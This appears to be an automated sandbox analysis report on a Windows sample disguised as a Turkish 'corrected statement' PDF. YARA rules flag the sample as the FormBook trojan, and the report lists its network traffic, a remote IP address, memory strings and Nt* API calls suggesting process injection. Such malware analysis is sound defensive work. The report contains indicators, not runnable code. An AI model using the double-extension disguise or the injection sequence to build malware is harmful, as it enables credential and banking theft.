        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/tropical-storm-francine-spaghetti-models-show-3-states-
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownHTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49755 version: TLS 1.2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD34E0 NtCreateMutant,LdrInitializeThunk,2_2_32BD34E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32BD2B90
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_32BD2BC0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_32BD2EB0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_32BD2D10
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD4260 NtSetContextThread,2_2_32BD4260
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD4570 NtSuspendThread,2_2_32BD4570
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2AA0 NtQueryInformationFile,2_2_32BD2AA0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2A80 NtClose,2_2_32BD2A80
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2AC0 NtEnumerateValueKey,2_2_32BD2AC0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2A10 NtWriteFile,2_2_32BD2A10
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2B80 NtCreateKey,2_2_32BD2B80
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2BE0 NtQueryVirtualMemory,2_2_32BD2BE0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2B20 NtQueryInformationProcess,2_2_32BD2B20
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2B10 NtAllocateVirtualMemory,2_2_32BD2B10
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2B00 NtQueryValueKey,2_2_32BD2B00
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD38D0 NtGetContextThread,2_2_32BD38D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD29F0 NtReadFile,2_2_32BD29F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD29D0 NtWaitForSingleObject,2_2_32BD29D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2E80 NtCreateProcessEx,2_2_32BD2E80
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2ED0 NtResumeThread,2_2_32BD2ED0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2EC0 NtQuerySection,2_2_32BD2EC0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2E00 NtQueueApcThread,2_2_32BD2E00
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2E50 NtCreateSection,2_2_32BD2E50
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2FB0 NtSetValueKey,2_2_32BD2FB0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2F30 NtOpenDirectoryObject,2_2_32BD2F30
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2F00 NtCreateFile,2_2_32BD2F00
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD3C90 NtOpenThread,2_2_32BD3C90
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2CF0 NtDelayExecution,2_2_32BD2CF0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2CD0 NtEnumerateKey,2_2_32BD2CD0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD3C30 NtOpenProcessToken,2_2_32BD3C30
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2C30 NtMapViewOfSection,2_2_32BD2C30
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2C20 NtSetInformationFile,2_2_32BD2C20
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2C10 NtOpenProcess,2_2_32BD2C10
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2C50 NtUnmapViewOfSection,2_2_32BD2C50
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2DA0 NtReadVirtualMemory,2_2_32BD2DA0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2DC0 NtAdjustPrivilegesToken,2_2_32BD2DC0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2D50 NtWriteVirtualMemory,2_2_32BD2D50
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00406C3F0_2_00406C3F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_701D1BFF0_2_701D1BFF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D2EC2_2_32B8D2EC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5124C2_2_32C5124C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B622452_2_32B62245
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B913802_2_32B91380
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAE3102_2_32BAE310
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5F3302_2_32C5F330
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B900A02_2_32B900A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD508C2_2_32BD508C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C570F12_2_32C570F1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAB0D02_2_32BAB0D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB1E02_2_32BBB1E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA51C02_2_32BA51C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F1132_2_32B8F113
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BE717A2_2_32BE717A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6010E2_2_32C6010E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3D1302_2_32C3D130
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C136EC2_2_32C136EC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5F6F62_2_32C5F6F6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA06802_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9C6E02_2_32B9C6E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4D6462_2_32C4D646
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBC6002_2_32BBC600
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC46702_2_32BC4670
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3D62C2_2_32C3D62C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C567572_2_32C56757
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAA7602_2_32BAA760
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA27602_2_32BA2760
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA04452_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C575C62_2_32C575C6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5F5C92_2_32C5F5C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5FA892_2_32C5FA89
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5EA5B2_2_32C5EA5B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5CA132_2_32C5CA13
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C14BC02_2_32C14BC0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BDDB192_2_32BDDB19
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0B102_2_32BA0B10
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5FB2E2_2_32C5FB2E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C518DA2_2_32C518DA
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C578F32_2_32C578F3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB68822_2_32BB6882
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA28C02_2_32BA28C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE8102_2_32BCE810
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5F8722_2_32C5F872
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA38002_2_32BA3800
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA98702_2_32BA9870
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBB8702_2_32BBB870
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B868682_2_32B86868
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C408352_2_32C40835
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9E9A02_2_32B9E9A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B699E82_2_32B699E8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5E9A62_2_32C5E9A6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BE59C02_2_32BE59C0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA1EB22_2_32BA1EB2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C59ED22_2_32C59ED2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B92EE82_2_32B92EE8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C50EAD2_2_32C50EAD
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C40E6D2_2_32C40E6D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC0E502_2_32BC0E50
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C51FC62_2_32C51FC6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA6FE02_2_32BA6FE0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5EFBF2_2_32C5EFBF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5FF632_2_32C5FF63
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BACF002_2_32BACF00
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBFCE02_2_32BBFCE0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C39C982_2_32C39C98
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB8CDF2_2_32BB8CDF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4EC4C2_2_32C4EC4C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAAC202_2_32BAAC20
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5EC602_2_32C5EC60
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B90C122_2_32B90C12
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C56C692_2_32C56C69
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA3C602_2_32BA3C60
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2DB02_2_32BB2DB0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3FDF42_2_32C3FDF4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA9DD02_2_32BA9DD0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C57D4C2_2_32C57D4C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9AD002_2_32B9AD00
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0D692_2_32BA0D69
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5FD272_2_32C5FD27
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289CAF32_2_3289CAF3
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_328A53D42_2_328A53D4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289E3272_2_3289E327
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289D8482_2_3289D848
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: String function: 32C1EF10 appears 104 times
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: String function: 32B8B910 appears 242 times
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: String function: 32BD5050 appears 34 times
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: String function: 32C0E692 appears 84 times
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: String function: 32BE7BE4 appears 87 times
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000000.00000000.23204327590.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23534901660.000000003292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000000.23348568303.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032E30000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23538857603.0000000032AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587010295.0000000002827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23586816547.000000000288E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeBinary or memory string: OriginalFilenamenygifte.exe4 vs D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
